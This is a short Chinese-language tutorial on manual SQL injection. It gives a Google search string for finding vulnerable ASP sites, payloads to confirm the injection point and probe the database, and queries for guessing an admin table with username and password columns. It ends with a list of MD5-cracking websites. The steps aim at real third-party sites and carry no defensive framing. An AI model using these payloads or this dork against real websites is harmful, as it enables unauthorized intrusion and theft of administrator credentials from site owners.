手工注入方法:在谷歌裏輸入關鍵字:inurl:encomphonorbig.asp?id=
手工注入教程:
1、www.google.com.hk搜索:inurl:encomphonorbig.asp?id=
2、判斷注入點:and 1=1 and 1=2 存在漏洞
3、判斷數據庫:' ; ;-- and len('a')=1
4、猜表:and (select count(*) from admin),顯示正常說明admin存在
5、猜字段: and (select count(username,password)from admin),顯示正常說明username,password字段存在
6、order by 5
MD5破解:
http://www.cmd5.com
http://xmd5.org
http://md5.syue.com
gttp://md5.com.cn
gttp://md5.asia